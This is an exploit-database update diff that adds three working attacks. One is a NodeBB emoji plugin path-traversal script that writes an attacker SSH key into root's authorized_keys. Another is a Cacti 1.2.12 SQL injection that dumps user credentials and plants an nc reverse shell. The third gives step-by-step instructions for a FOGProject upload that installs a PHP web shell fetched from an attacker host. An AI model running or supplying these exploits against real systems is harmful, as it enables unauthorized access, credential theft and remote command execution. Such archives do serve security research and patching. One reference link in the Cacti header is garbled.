DB: 2021-04-30

3 changes to exploits/shellcodes

Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution
FOGProject 1.5.9 - File Upload RCE (Authenticated)
NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write

exploits/multiple/webapps/49813.py

@@ -0,0 +1,66 @@
+# Exploit Title: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write
+# Date: 2021-02-01
+# Exploit Author: 1F98D
+# Software Link: https://nodebb.org/
+# Version: Emoji for NodeBB <= v3.2.1
+# Tested on: Ubuntu 18.04 (x86)
+# Software Link: https://github.com/NodeBB/nodebb-plugin-emoji
+#
+# The Emoji for NodeBB which is installed by default contains an
+# arbitrary file write vulnerability to insecurely handled user controlled
+# input.
+#
+# This exploit requires administrative access to the NodeBB instance in order
+# to access the emoji upload API.
+# 
+#!/usr/bin/python3
+import requests
+import sys
+import re
+TARGET = 'http://192.168.1.1:4567'
+USERNAME = 'admin'
+PASSWORD = 'password'
+DESTINATION_FILE = '/root/.ssh/authorized_keys'
+SOURCE_FILE = '/home/kali/.ssh/id_rsa.pub'
+headers = { 'User-Agent': 'NotPython' }
+s = requests.Session()
+r = s.get('{}/login'.format(TARGET), headers=headers)
+if r.status_code != 200:
+    print('[!] Error, {}/login unavailable'.format(TARGET))
+    sys.exit(1)
+csrf = re.search('name="_csrf" value="(.+)?" />', r.text, re.IGNORECASE)
+if csrf is None:
+    print('[!] Could not extract csrf token to proceed.')
+    sys.exit(1)
+auth = {
+    'username': USERNAME,
+    'password': PASSWORD,
+    '_csrf': csrf.group(1)
+}
+r = s.post('{}/login'.format(TARGET), headers=headers, data=auth)
+if r.status_code != 200:
+    print('[!] Error, login failed')
+    print('[!] Status: {}'.format(r.status_code))
+    print('[!] Response: {}'.format(r.text))
+    sys.exit(1)
+print('[+] Login successful')
+r = s.get('{}/admin/plugins/emoji'.format(TARGET), headers=headers)
+if r.status_code != 200:
+    print('[!] Error, could not access emoji plugin')
+    print('[!] Status: {}'.format(r.status_code))
+    print('[!] Response: {}'.format(r.text))
+    sys.exit(1)
+print('[+] Emoji plugin is installed')
+files = {
+    'emojiImage': open(SOURCE_FILE)
+}
+data = {
+    'fileName': '../../../../../../..{}'.format(DESTINATION_FILE)
+}
+r = s.post('{}/api/admin/plugins/emoji/upload'.format(TARGET), headers=headers, data=data, files=files)
+if r.status_code != 200:
+    print('[!] Error, could not upload file')
+    print('[!] Status: {}'.format(r.status_code))
+    print('[!] Response: {}'.format(r.text))
+    sys.exit(1)
+print('[+] Successfully uploaded file')

exploits/php/webapps/49810.py

@@ -0,0 +1,92 @@
+# Exploit Title: Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution
+# Date: 04/28/2021
+# Exploit Author: Leonardo Paiva
+# Vendor Homepage: https://www.cacti.net/
+# Software Link: https://www.cacti.net/downloads/cacti-1.2.12.tar.gz
+# Version: 1.2.12
+# Tested on: Ubuntu 20.04
+# CVE : CVE-2020-14295
+# Credits: @M4yFly (https://twitter.com/M4yFly)
+# References:
+# https://github.commandcom/Cacti/cacti/issues/3622
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295
+
+#!/usr/bin/python3
+
+import argparse
+import requests
+import sys
+import urllib.parse
+from bs4 import BeautifulSoup
+
+# proxies = {'http': 'http://127.0.0.1:8080'}
+
+
+def login(url, username, password, session):
+    print("[+] Connecting to the server...")
+    get_token_request = session.get(url + "/cacti/index.php", timeout=5) #, proxies=proxies)
+
+    print("[+] Retrieving CSRF token...")
+    html_content = get_token_request.text
+    soup = BeautifulSoup(html_content, 'html.parser')
+
+    csrf_token = soup.find_all('input')[0].get('value').split(';')[0]
+
+    if csrf_token:
+        print(f"[+] Got CSRF token: {csrf_token}")
+        print("[+] Trying to log in...")
+
+        data = {
+            '__csrf_magic': csrf_token,
+            'action': 'login',
+            'login_username': username,
+            'login_password': password
+        }
+
+        login_request = session.post(url + "/cacti/index.php", data=data) #, proxies=proxies)
+        if "Invalid User Name/Password Please Retype" in login_request.text:
+            print("[-] Unable to log in. Check your credentials")
+            sys.exit()
+        else:
+            print("[+] Successfully logged in!")
+    else:
+        print("[-] Unable to retrieve CSRF token!")
+        sys.exit()
+
+
+def exploit(lhost, lport, session):
+    rshell = urllib.parse.quote(f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f")
+    payload = f"')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='{rshell};'+where+name='path_php_binary';--+-"
+
+    exploit_request = session.get(url + f"/cacti/color.php?action=export&header=false&filter=1{payload}") #, proxies=proxies)
+
+    print("\n[+] SQL Injection:")
+    print(exploit_request.text)
+
+    try:
+        session.get(url + "/cacti/host.php?action=reindex", timeout=1) #, proxies=proxies)
+    except Exception:
+        pass
+
+    print("[+] Check your nc listener!")
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution')
+
+    parser.add_argument('-t', metavar='<target/host URL>', help='target/host URL, example: http://192.168.15.58', required=True)
+    parser.add_argument('-u', metavar='<user>', help='user to log in', required=True)
+    parser.add_argument('-p', metavar='<password>', help="user's password", required=True)
+    parser.add_argument('--lhost', metavar='<lhost>', help='your IP address', required=True)
+    parser.add_argument('--lport', metavar='<lport>', help='your listening port', required=True)
+    args = parser.parse_args()
+
+    url = args.t
+    username = args.u
+    password = args.p
+    lhost = args.lhost
+    lport = args.lport
+
+    session = requests.Session()
+
+    login(url, username, password, session)
+    exploit(lhost, lport, session)

exploits/php/webapps/49811.txt

@@ -0,0 +1,31 @@
+# Exploit Title: FOGProject 1.5.9 - File Upload RCE (Authenticated)
+# Date: 2021-04-28
+# Exploit Author: sml@lacashita.com
+# Vendor Homepage: https://fogproject.org
+# Software Link: https://github.com/FOGProject/fogproject/archive/1.5.9.zip
+# Tested on: Debian 10
+
+On the Attacker Machine:
+
+1) Create an empty 10Mb file.
+dd if=/dev/zero of=myshell bs=10485760 count=1
+
+2) Add your PHP code to the end of the file created in the step 1.
+echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell
+
+3) Put the file "myshell" accessible through HTTP.
+$ cp myshell /var/www/html
+
+4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP).
+$ echo "http://ATTACKER_IP/myshell" | base64
+aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=
+
+5) Visit 
+http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<YOUR_MYSHELL_URL_HERE>=&arch=arm64
+Example:
+http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64
+
+6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php 
+and click on Install.
+
+7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname

files_exploits.csv

@@ -43980,3 +43980,6 @@ id,file,description,date,author,type,platform,port
 49805,exploits/php/webapps/49805.txt,"Kimai 1.14 - CSV Injection",2021-04-27,"Mohammed Aloraimi",webapps,php,
 49806,exploits/php/webapps/49806.txt,"Montiorr 1.7.6m - File Upload to XSS",2021-04-27,"Ahmad Shakla",webapps,php,
 49808,exploits/php/webapps/49808.txt,"Kirby CMS 3.5.3.1 - 'file' Cross-Site Scripting (XSS)",2021-04-28,"Sreenath Raghunathan",webapps,php,
+49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution",2021-04-29,"Leonardo Paiva",webapps,php,
+49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php,
+49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",2021-04-29,1F98D,webapps,multiple,